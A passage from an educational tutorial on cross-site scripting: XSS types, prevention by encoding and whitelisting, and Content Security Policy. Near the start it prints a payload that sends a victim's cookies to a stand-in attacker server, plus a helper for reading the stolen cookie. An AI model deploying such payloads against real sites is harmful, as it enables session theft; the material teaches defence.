- An attacker's server is a web server controlled by an attacker with the sole purpose of stealing the victim's confidential information. In our examples, it is located at http://attacker/.

Example attack scenario

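In this example, we assume that the attacker's goal is to steal the victim's cookies by exploiting an XSS vulnerability in the website. This can be done by having the victim's browser parse the following HTML code:

<script>window.location="http://attacker/?cookie="+document.cookie</script>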

This script navigates the user's browser to a different URL, triggering an HTTP request to the attacker's server. The URL includes the victim's cookies as a query parameter, so when the request arrives at the attacker's server, the attacker can extract the cookies from it. Once the attacker has obtained the cookies, they can use them to impersonate the victim and launch further attacks.
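On the receiving end, reading the cookies out of the request is straightforward. The sketch below assumes the attacker's server sees the full request URL; the function name extractStolenCookies is hypothetical. It relies on the standard URL class available in browsers and in Node.js.

```javascript
// Returns the value of the "cookie" query parameter, or null if it is absent.
function extractStolenCookies(requestUrl) {
  const url = new URL(requestUrl);
  return url.searchParams.get("cookie");
}

// What the injected script would request if document.cookie were "sessionId=abc123".
const requestUrl = "http://attacker/?cookie=" + "sessionId=abc123";
console.log(extractStolenCookies(requestUrl));
```

This is why session cookies are such an attractive target: a single request is enough to hand them over.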

From now on, the HTML code shown above will be called a malicious string or malicious script. It is important to understand that the string itself is only malicious if it is ultimately rendered as HTML in the victim's browser, and this can only happen if there is an XSS vulnerability in the website.

How this example attack works

The steps below show how this example attack is carried out by the attacker:

The attacker uses one of the website's forms to insert a malicious string into the website's database.

The victim requests a page from a website.

The website includes the malicious string from the database in the response and sends it to the victim.

The victim's browser executes a malicious script inside the response, sending the victim's cookie to the attacker's server.

XSS Types

The goal of an XSS attack is always to execute a malicious JavaScript script in the victim's browser. There are several fundamentally different ways to achieve this goal. XSS attacks are often divided into three types:

Stored (persistent) XSS, where the malicious string originates from the website's database.
Reflected (non-persistent) XSS, where the malicious string is generated from the victim's request.
DOM-based XSS, where the vulnerability is in the client-side code rather than the server-side code.

The previous example shows a stored XSS attack. We will now describe two other types of XSS attacks: reflected XSS and DOM XSS attacks.

Reflected XSS

In a reflected XSS attack, the malicious string is part of the victim's request to the website. The website then includes this malicious string in the response sent back to the user. The steps below illustrate this scenario:

The attacker crafts a URL containing a malicious string and sends it to the victim.

The victim is tricked by the attacker into requesting the URL from the website.

The site includes a malicious string from the URL request in the response to the victim.

The victim's browser executes the malicious script contained in the response, sending the victim's cookies to the attacker's server.
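The reflected case can be sketched in a few lines. The search page, the keyword parameter, and the function name renderSearchPage are assumptions chosen for illustration; the point is only that the value from the request is echoed into the response unencoded.

```javascript
// Vulnerable: the "keyword" query parameter is echoed into the page unencoded.
function renderSearchPage(requestUrl) {
  const keyword = new URL(requestUrl).searchParams.get("keyword") || "";
  return "<html>\nYou searched for: " + keyword + "\n</html>";
}

// The attacker crafts a URL whose parameter value is a script element.
const maliciousUrl =
  "http://website/search?keyword=" + encodeURIComponent("<script>...</script>");
console.log(renderSearchPage(maliciousUrl));
```

Nothing is stored on the website: the malicious string travels in the URL and comes straight back in the response.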

How to successfully carry out a reflected XSS attack?

A reflected XSS attack may seem harmless because it requires the victim to personally send a request that contains a malicious string. Since no one would voluntarily attack themselves, there seems to be no way to actually carry out the attack.

As it turns out, there are at least two common ways to get a victim to launch a reflected XSS attack against themselves:

If the target is a specific person, the attacker can send the malicious URL to the victim (for example, via email or instant messenger) and trick them into opening the link.
If the target is a large group of users, the attacker could post a link to a malicious URL (for example on their own website or social network) and wait for visitors to click on the link.

Both of these methods are similar, and both can be more successful with the use of a URL shortening service, which masks the malicious string from users who might otherwise identify it.

XSS in the DOM

DOM-based XSS is a variant of both stored and reflected XSS. In a DOM-based XSS attack, the malicious string is not actually parsed by the victim's browser until the website's legitimate JavaScript is executed. The steps below illustrate this scenario for a reflected XSS attack:

The attacker creates a URL containing a malicious string and sends it to the victim.

The victim is tricked by the attacker into requesting the URL from the website.

The site accepts the request, but does not include the malicious string in the response.

The victim's browser executes the legitimate script contained in the response, causing the malicious script to be inserted into the page.

The victim's browser executes a malicious script inserted into the page, sending the victim's cookies to the attacker's server.

What makes XSS in the DOM different?

In the previous examples of stored and reflected XSS attacks, the server inserts a malicious script into a page, which is then forwarded in a response to the victim. When the victim's browser receives the response, it assumes that the malicious script is part of the page's legitimate content and automatically executes it while the page is loading, just like any other script.

In the example of an XSS attack in the DOM, the malicious script is not inserted as part of the page; the only script that is automatically executed while the page is loading is a legitimate part of the page. The problem is that this legitimate script directly uses user input to add HTML to the page. Since the malicious string is inserted into the page using innerHTML , it is parsed as HTML, causing the malicious script to be executed.

This difference is small, but very important:

In traditional XSS, malicious JavaScript is executed when the page is loaded, as part of the HTML sent by the server.
In the case of XSS in the DOM, malicious JavaScript is executed at some point after the page has loaded, as a result of the page's legitimate JavaScript handling user input (containing the malicious string) in an insecure manner.
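The difference can be sketched with two small functions. Both names are hypothetical, and the element parameter is assumed to be a DOM element when run in a browser; nothing here is taken from the website's actual code.

```javascript
// Vulnerable: the user-controlled value is parsed as HTML when assigned to innerHTML.
function showGreetingUnsafe(element, name) {
  element.innerHTML = "Hello, " + name;
}

// Safer: textContent treats the value as plain text, never as markup.
function showGreetingSafe(element, name) {
  element.textContent = "Hello, " + name;
}

// In a browser, this might be called as follows (names are illustrative):
//   const name = decodeURIComponent(window.location.hash.slice(1));
//   showGreetingSafe(document.querySelector("#greeting"), name);
```

The server-side code is identical in both cases; only the client-side handling of the input decides whether the page is vulnerable.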

How does XSS work in the DOM?

There is no need for JavaScript in the previous example; the server can generate all the HTML by itself. If the server-side code were free of vulnerabilities, the website would not be vulnerable to XSS.

However, as web applications become more advanced, more and more HTML is generated by JavaScript on the client side rather than by the server. Whenever content needs to change without refreshing the entire page, the update has to be performed using JavaScript. This is particularly the case when a page is updated after an AJAX request.

This means that XSS vulnerabilities can be present not only in the server-side code of your site, but also in its client-side JavaScript code. Consequently, even with completely secure server-side code, the client-side code may still include user input unsafely when updating the DOM after the page has loaded. If this happens, the client-side code enables an XSS attack through no fault of the server-side code.

DOM-based XSS may not be visible to the server

There is a special case of XSS in the DOM in which the malicious string is never sent to the website's server: this occurs when the malicious string is contained in the URL's fragment identifier (anything after the # character). Browsers do not send this part of the URL to the server, so the website cannot access it using server-side code. Client-side code, however, does have access to it, and can therefore introduce an XSS vulnerability by handling it insecurely.
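A small sketch makes the split visible. The function name splitUrl and the example URL are assumptions for illustration; the URL class is the standard one available in browsers and Node.js.

```javascript
// Splits a URL into the part sent in the HTTP request and the part kept by the browser.
function splitUrl(urlString) {
  const url = new URL(urlString);
  return {
    sentToServer: url.pathname + url.search, // the request target
    keptInBrowser: url.hash,                 // the fragment, including the leading "#"
  };
}

console.log(splitUrl("http://website/welcome?lang=en#name=Alice"));
```

Anything placed in the fragment is visible to client-side code through window.location.hash, but never appears in the server's logs or input filters.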

This case is not limited to the fragment identifier. Other user input is also invisible to the server, such as data kept in HTML5 features like LocalStorage and IndexedDB.

Part three: XSS Prevention

XSS Prevention Techniques

Recall that XSS is a code injection attack: user input is mistakenly interpreted as program code. To prevent this type of code injection, secure input handling is required. For a web developer, there are two fundamentally different ways to perform secure input handling:

Encoding, which escapes user input so that the browser interprets it only as data, not as code.
Validation, which filters user input so that the browser interprets it as code without malicious commands.

Although these are fundamentally different XSS mitigation methods, they share several common features that are important to understand when using either one:

Context: Secure input handling must be done differently depending on where on the page the user input is used.

Inbound/outbound: Secure input handling can be done either when your site receives the input (inbound) or right before the site inserts the user input into a page (outbound).

Client/server: Secure input handling can be done on either the client side or the server side; each option is needed under different circumstances.

There are many contexts on a web page where user input can be inserted. For each of them, specific rules must be followed to ensure that user input cannot break out of its context and be interpreted as malicious code. The most common contexts are HTML element content, HTML attribute values, URL query values, CSS values, and JavaScript values.

Why do contexts matter?

In all of the described contexts, an XSS vulnerability arises if user input is inserted without first being encoded or validated. An attacker can then inject malicious code simply by inserting the closing delimiter for that context, followed by the malicious code.

For example, if at some point a website includes user input directly in an HTML attribute, an attacker could inject a malicious script by starting their input with a quotation mark, which closes the attribute value early.

This could be prevented by simply removing all quotation marks from the user input, and everything would be fine, but only in this context. If the same input were inserted into a different context, the closing delimiter would be different and injection would become possible again. For this reason, secure input handling must always be tailored to the context into which the user input will be inserted.
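The point can be checked with a small experiment. The three helper functions below are hypothetical and deliberately simplistic; they only model how a page might be assembled from strings.

```javascript
// Naive defense: remove every double quote from the input.
function stripQuotes(input) {
  return input.split('"').join("");
}

// Context 1: user input inside a double-quoted HTML attribute value.
function renderAttribute(input) {
  return '<input value="' + input + '">';
}

// Context 2: user input as the content of an HTML element.
function renderElement(input) {
  return "<div>" + input + "</div>";
}

const attack = '"><script>...</script>';
console.log(renderAttribute(attack));              // the quote closes the attribute early
console.log(renderAttribute(stripQuotes(attack))); // the input stays inside the attribute value
console.log(renderElement(stripQuotes(attack)));   // the script element still gets through
```

Stripping quotes neutralizes the attack in the attribute context, yet the very same filtered input remains dangerous as element content.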

Handling incoming/outgoing user input

Instinctively, it would seem that XSS could be prevented by encoding or validating all user input as soon as our site receives it. This way, any malicious strings will already be neutralized whenever they are included in the page, and the HTML generation scripts won't have to worry about handling user input safely.

The problem is that, as described earlier, user input can be inserted into several different contexts on a page. There is no easy way to determine, at the moment user input arrives, which context it will eventually be inserted into, and the same user input often needs to be inserted into different contexts. By relying on inbound input handling to prevent XSS, we create a very brittle solution that is prone to errors. (The legacy PHP "magic quotes" feature is an example of such a solution.)

Instead, outbound input handling should be your primary line of defense against XSS, because it can take into account the specific context into which the user input will be inserted. To some extent, inbound validation can be used to add a secondary layer of protection, but more on that later.

Where is it possible to handle user input securely?

In most modern web applications, user input is processed both on the server side and on the client side. To protect against all types of XSS, secure input handling must be done in both server-side and client-side code.

To protect against traditional XSS, secure input handling must be done in server-side code. This is done using some language supported by the server.
To protect against an XSS attack in the DOM, where the server never receives the malicious string (such as the fragment identifier attack described earlier), secure input handling must be done in client-side code. This is done using JavaScript.

Now that we've explained why context matters, why the distinction between inbound and outbound input handling is important, and why secure input handling must be done on both the client side and the server side, we can go on to explain how the two types of secure input handling (encoding and validation) are actually performed.

Encoding

Encoding is the act of escaping user input so that the browser interprets it only as data, not as code. The most widely known type of encoding in web development is HTML escaping, which converts characters such as < and > into &lt; and &gt; respectively.

The following pseudocode is an example of how user input (userInput) can be encoded using HTML escaping and then inserted into a page by a server-side script:

print "<html>"
print "Last comment: "
print encodeHtml(userInput)
print "</html>"

If the user input were the string <script>...</script>, the resulting HTML would look like this:

<html>
Last comment:
&lt;script&gt;...&lt;/script&gt;
</html>

Because all characters with special meaning have been escaped, the browser will not parse any part of the user input as HTML.
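The pseudocode leaves encodeHtml undefined. A minimal sketch of such a function in JavaScript might look like the following; it is one possible implementation under the assumption that the output is used as HTML element content or inside a quoted attribute, and in practice a well-tested library function is preferable.

```javascript
// Replaces the characters that have special meaning in HTML with entities.
// "&" must be replaced first so that the entities produced below are not re-encoded.
function encodeHtml(input) {
  return String(input)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

console.log(encodeHtml("<script>...</script>"));
```

The order of the replacements matters: if the ampersand were handled last, the entities created by the earlier steps would themselves be escaped.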

Encoding in client-side and server-side code

When performing encoding in client-side code, the language used is always JavaScript, which has built-in functions that encode data for different contexts.

When performing encoding in server-side code, you rely on the functions available in your language or framework. Because of the large number of languages and frameworks available, this tutorial does not cover the details of encoding in any specific server-side language or framework. However, familiarity with the JavaScript encoding functions used on the client side is also useful when writing server-side code.

Encoding on the client side

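When encoding user input on the client side using JavaScript, there are several built-in methods and properties that automatically encode data in a context-sensitive manner:

HTML element content: node.textContent = userInput
HTML attribute value: element.setAttribute(attribute, userInput) or element[attribute] = userInput
URL query value: window.encodeURIComponent(userInput)
CSS value: element.style.property = userInput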

The last context mentioned above (values in JavaScript) is not included in this list because JavaScript does not provide a built-in way of encoding data for inclusion in JavaScript source code.
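As one concrete case, the built-in encodeURIComponent function handles the URL query value context. The search path and parameter name below are illustrative assumptions, not part of the tutorial's website.

```javascript
// Builds a search URL; the path and parameter name are illustrative only.
function buildSearchUrl(keyword) {
  return "http://website/search?keyword=" + encodeURIComponent(keyword);
}

console.log(buildSearchUrl("cats&admin=true"));
```

Because the & and = characters are percent-encoded, the input cannot break out of its parameter value and add parameters of its own.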

Encoding Limitations

Even with encoding, it is still possible to supply malicious strings in some contexts. A clear example of this is when user input is used to provide a URL, as in the example below:

document.querySelector("a").href = userInput

Although assigning a value to an element's href property automatically encodes it so that it becomes nothing more than an attribute value, this in itself does not prevent an attacker from inserting a URL that starts with "javascript:". When the link is clicked, the JavaScript embedded in the URL will be executed, regardless of how the link was constructed.

Encoding is also not an effective solution when you want users to be able to use some HTML code on the page. An example would be a user profile page where the user can define custom HTML. If this custom HTML were encoded, the profile page could consist only of plain text.

In such situations, encoding must be complemented by validation, which we will look at next.

Validation

Validation is the act of filtering user input so that all malicious parts of it are removed, without necessarily removing all the code in it. One of the most widely used types of validation in web development allows some HTML elements (for example, <em> and <strong>) while disallowing others (for example, <script>).

There are two main characteristics of validation that differ between implementations:

Classification strategy: User input can be classified using either blacklisting or whitelisting.

Validation outcome: User input identified as malicious can be either rejected or sanitized.

Classification strategy

Blacklisting

Instinctively, it seems reasonable to perform validation by defining a forbidden pattern that should not appear in user input. If a string matches this pattern, it is marked as invalid. An example would be to allow users to submit custom URLs with any protocol except javascript:. This classification strategy is called blacklisting.

However, blacklisting has two major drawbacks:

Complexity: Accurately describing the set of all possible malicious strings is usually a very difficult task. The example policy described above cannot be successfully implemented by simply searching for the substring "javascript", because this would miss strings such as "Javascript:" (where the first letter is uppercase) and "&#106;avascript:" (where the first letter is encoded as a numeric character reference).

Staleness: Even if a perfect blacklist were developed, it would fail as soon as a new feature allowing malicious use was added to the browser. For example, an HTML validation blacklist developed before the onmousewheel attribute was introduced in HTML5 would not be able to stop an attacker from using this attribute to perform an XSS attack. This drawback is especially significant in web development, which consists of many different technologies that are constantly being updated.
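The complexity drawback is easy to reproduce. The sketch below implements the naive substring check described above; the function name is hypothetical.

```javascript
// Naive blacklist: reject any input containing the lowercase substring "javascript".
function isRejectedByNaiveBlacklist(input) {
  return input.includes("javascript");
}

console.log(isRejectedByNaiveBlacklist("javascript:..."));      // caught
console.log(isRejectedByNaiveBlacklist("Javascript:..."));      // missed: uppercase first letter
console.log(isRejectedByNaiveBlacklist("&#106;avascript:...")); // missed: encoded first letter
```

Each missed variant could be patched individually, but the list of variants an attacker can try is effectively open-ended.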

Because of these drawbacks, blacklisting is strongly discouraged as a classification strategy. Whitelisting is generally a much safer approach, which we describe next.

Whitelisting

Whitelisting is essentially the opposite of blacklisting: instead of defining a forbidden pattern, a whitelist approach defines an allowed pattern and marks the input as invalid if it does not match this pattern.

In contrast to the blacklisting example, an example of whitelisting would be to allow users to submit custom URLs containing only the http: and https: protocols, and nothing else. With this approach, a URL is automatically marked as invalid if it uses the javascript: protocol, even if it is written as "Javascript:" or "&#106;avascript:".
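A whitelist check along these lines could be sketched as follows. The function name isAllowedUrl is hypothetical, and the sketch assumes that only absolute URLs should be accepted; it uses the standard URL class, which normalizes the protocol to lowercase.

```javascript
const ALLOWED_PROTOCOLS = ["http:", "https:"];

// Returns true only for absolute URLs whose protocol is on the whitelist.
function isAllowedUrl(input) {
  let url;
  try {
    url = new URL(input); // throws on anything that is not an absolute URL
  } catch (error) {
    return false;
  }
  return ALLOWED_PROTOCOLS.includes(url.protocol); // protocol is normalized to lowercase
}

console.log(isAllowedUrl("https://example.com/"));
console.log(isAllowedUrl("Javascript:..."));
console.log(isAllowedUrl("&#106;avascript:..."));
```

Neither disguised variant needs special handling: anything that is not explicitly http: or https: is rejected.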

Compared to blacklisting, whitelisting has two major advantages:

Simplicity: Accurately describing the set of benign strings is usually much easier than identifying the set of all malicious strings. This is especially true in common situations where user input only needs to include a very limited subset of the functionality available in the browser. For example, the whitelist described above simply allows URLs with the http: or https: protocols, and in most situations this is quite sufficient for users.

Longevity: Unlike a blacklist, a whitelist generally does not become obsolete when a new feature is added to the browser. For example, an HTML validation whitelist that allows only the title attribute on HTML elements would remain safe even if it was developed before the introduction of the HTML5 onmousewheel attribute.

Validation result

When user input has been marked as invalid, one of two actions can be taken:

Rejection: The input is simply rejected, preventing it from being used elsewhere on the site.

Sanitization: The invalid parts of the input are removed, and the remaining input is used normally by the site.

If you decide to implement sanitization, you need to make sure that the sanitization routine itself does not use a blacklist approach. For example, the URL "Javascript:...", even when identified as invalid using a whitelist, would bypass a sanitization routine that simply removes all instances of "javascript:". For this reason, well-tested libraries and frameworks should be used for sanitization whenever possible.
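The bypass can be demonstrated with a deliberately flawed sanitizer. The function name is hypothetical, and the third input is an additional illustration not taken from the text above: removing the inner occurrence re-creates the very string the routine was meant to remove.

```javascript
// Flawed sanitizer: strips every lowercase "javascript:" occurrence in a single pass.
function removeJavascriptProtocol(input) {
  return input.replace(/javascript:/g, "");
}

console.log(removeJavascriptProtocol("javascript:..."));            // stripped as intended
console.log(removeJavascriptProtocol("Javascript:..."));            // unchanged: case differs
console.log(removeJavascriptProtocol("javajavascript:script:...")); // removal re-creates the protocol
```

Both failures come from the same root cause: the routine enumerates what to remove instead of defining what is allowed to remain.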

What methods should be used for prevention?

Encoding should be your first line of defense against XSS attacks, because its very purpose is to process data in such a way that the browser cannot interpret user input as code. In some cases, encoding must be complemented by validation. Encoding and validation should be applied outbound, because only then do you know in which context the user input will be inserted and which encoding and validation need to be applied.

As a second line of defense, you should use inbound validation to sanitize or reject data that is clearly invalid, such as links using the javascript: protocol. This cannot by itself provide complete security, but it is a useful precaution in case the outbound encoding and validation fail at some point because of an implementation mistake.

If these two lines of defense are used consistently, your site will be protected from XSS attacks. However, given the complexity of creating and maintaining a website, achieving complete protection using only secure input handling can be difficult. As a third line of defense, you should use Content Security Policy (CSP), which we describe next.

Content Security Policies (CSP)

Relying only on secure input handling to protect against XSS attacks is not enough, because even a single security lapse can compromise your website. Adopting Content Security Policy (CSP), a newer web standard, can reduce this risk.

CSP is used to constrain the browser viewing your page so that it can only use resources downloaded from trusted sources. A resource is a script, a style sheet, an image, or some other type of file that is referenced by the page. This means that even if an attacker manages to inject malicious content into your site, CSP can prevent it from being executed.

CSP can be used to enforce the following rules:

No untrusted sources: External resources can only be loaded from a set of clearly defined trusted sources.

No inline resources: Inline JavaScript and CSS will not be evaluated.

No eval: The JavaScript eval function cannot be used.

CSP in action

In the following example, an attacker managed to inject malicious code into a web page:

<html>
Last comment:
<script src="http://attacker/malicious-script.js"></script>
</html>

With a correctly defined CSP policy, the browser will not load and execute malicious-script.js because http://attacker/ is not specified as a trusted source. Even though the site failed to handle user input securely in this case, the CSP policy prevented the vulnerability from causing any harm.

Even if the attacker had injected the script code inline rather than as a link to an external file, a properly defined CSP policy that disallows inline JavaScript would also have prevented the vulnerability from causing any harm.

How to enable CSP?

By default, browsers do not enforce CSP. To enable CSP on your website, pages must be served with an additional HTTP header: Content-Security-Policy. Any page served with this header will have its security policy enforced when loaded by the browser, provided the browser supports CSP.

Because the security policy is sent with every HTTP response, it is possible for the server to set the policy individually for each page. The same policy can be applied to the entire website by inserting the same CSP header in every response.
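On a server written with Node.js, one way to attach the same header to every response is to wrap the request handler. The sketch below is an assumption-laden illustration: the wrapper name withCsp and the policy value are hypothetical, while setHeader is the standard method on Node's HTTP response object.

```javascript
// Example policy value; the policy itself is an assumption for this sketch.
const CSP_POLICY = "default-src 'self'";

// Wraps a Node.js-style request handler so every response carries the CSP header.
function withCsp(handler) {
  return function (request, response) {
    response.setHeader("Content-Security-Policy", CSP_POLICY);
    return handler(request, response);
  };
}

// Possible usage with Node's built-in http module:
//   const http = require("http");
//   http.createServer(withCsp((req, res) => res.end("<html>...</html>"))).listen(8080);
```

Setting a different policy for individual pages would only require choosing the policy value based on the request before calling setHeader.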

The value of the Content-Security-Policy header is a string that defines one or more security policies that will take effect on your site. The syntax of this string is described below.

The example headers in this section use line breaks and indentation for readability; these should not appear in an actual header.

CSP Syntax

The CSP header syntax is as follows:

Content-Security-Policy:
    directive source-expression source-expression ...;
    directive ...;
    ...

This syntax consists of two elements:

Directives are strings that specify a type of resource, taken from a predefined list.
Source expressions are patterns that describe one or more servers from which resources can be loaded.

For each directive, the given source expressions specify which sources can be used to load resources of the corresponding type.

Directives

The following directives can be used in the CSP header:

connect-src
font-src
frame-src
img-src
media-src
object-src
script-src
style-src

In addition to this, the special default-src directive can be used to provide a default value for all directives that were not included in the header.

Source expression

The syntax for creating a source expression is as follows:

protocol://host-name:port-number

The host name can start with *, meaning that any subdomain of the provided host name will be allowed. Similarly, the port number can be *, meaning that all ports will be allowed. Additionally, the protocol and port number can be omitted. If no protocol is specified, the browser matches the source against the protocol of the page itself, so for a page served over HTTPS such resources must also be loaded using HTTPS.

In addition to the above syntax, a source expression can alternatively be one of four keywords with a special meaning (quotes included):

'none' disallows all resources.

'self' allows resources from the host on which the web page is located.

'unsafe-inline' allows resources embedded in the page, such as inline <script> elements, <style> elements, and javascript: URLs.

'unsafe-eval' allows the use of the JavaScript function eval.

Please note that whenever CSP is used, inline resources and eval are automatically disallowed by default. Using 'unsafe-inline' and 'unsafe-eval' is the only way to allow them.

Example Policy

Content-Security-Policy:
    script-src 'self' scripts.example.com;
    media-src 'none';
    img-src *;
    default-src 'self' http://*.example.com

With this example policy, the web page will have the following restrictions:

Scripts can only be downloaded from the host on which the web page is located and from scripts.example.com.

Audio and video files cannot be downloaded from anywhere.

Images can be downloaded from any address.

All other resources can only be downloaded from the host on which the web page is located and from any subdomain of example.com.
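Since an actual header value must be a single line, it can be convenient to keep the policy as structured data and join it when the response is built. The helper below is a hypothetical sketch, not part of any CSP library; note that the special keywords are written with single quotes.

```javascript
// Joins a map of directive -> source expressions into a single header value.
function buildCspHeaderValue(directives) {
  return Object.entries(directives)
    .map(([directive, sources]) => directive + " " + sources.join(" "))
    .join("; ");
}

const policy = buildCspHeaderValue({
  "script-src": ["'self'", "scripts.example.com"],
  "media-src": ["'none'"],
  "img-src": ["*"],
  "default-src": ["'self'", "http://*.example.com"],
});
console.log(policy);
```

Keeping the directives in one object also makes it easier to review which sources are trusted for each resource type.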

As of June 2013, Content Security Policy is a W3C Candidate Recommendation. CSP is being implemented by browser vendors, but some parts of it are still browser-specific. For example, the name of the HTTP header to use may differ between browsers. Before using CSP, consult the documentation of the browsers you plan to support.

Summary

Summary: XSS Overview

An XSS attack is a code injection attack made possible by insecure processing of user input.
A successful XSS attack allows the attacker to execute malicious JavaScript in the victim's browser.
A successful XSS attack compromises the security of both the website and its users.

Summary: XSS attacks

There are three main types of XSS attacks:
- Stored XSS, where malicious input originates from the website's database.
- Reflected XSS, where malicious input originates from the victim's request.
- XSS attacks in the DOM, where the vulnerability is exploited in code on the client side, and not on the server side.
All of these attacks are performed differently, but have the same effect if successful.

Summary: Preventing XSS

The most important way to prevent XSS attacks is to perform secure input processing.
- Encoding must be done whenever user input is included in a page.
- In some cases, encoding must be replaced or supplemented by validation.
- Secure input handling must take into account what page context the user input is being inserted into.
- In order to prevent all types of XSS attacks, secure input processing must be done in both client-side and server-side code.
Content Security Policies (CSP) provide an additional layer of protection in the event that secure input processing contains an error.

Appendix

Terminology

It should be noted that there is an overlap in the terminology used to describe XSS: an XSS attack in the DOM can be either stored or reflected; these are not separate types of attacks. There is no generally accepted terminology that covers all types of XSS without confusion. Regardless of the terminology used to describe XSS, the most important thing is to identify the type of attack, which is possible if you know where the malicious input comes from and where the vulnerability is located.

Rights of use and links

The source code for Excess XSS is available on GitHub.

Excess XSS was created in 2013 as part of the Language-Based Security course at Chalmers University of Technology.

Translation into Russian was carried out by A888R; the original English text is available at excess-xss.com.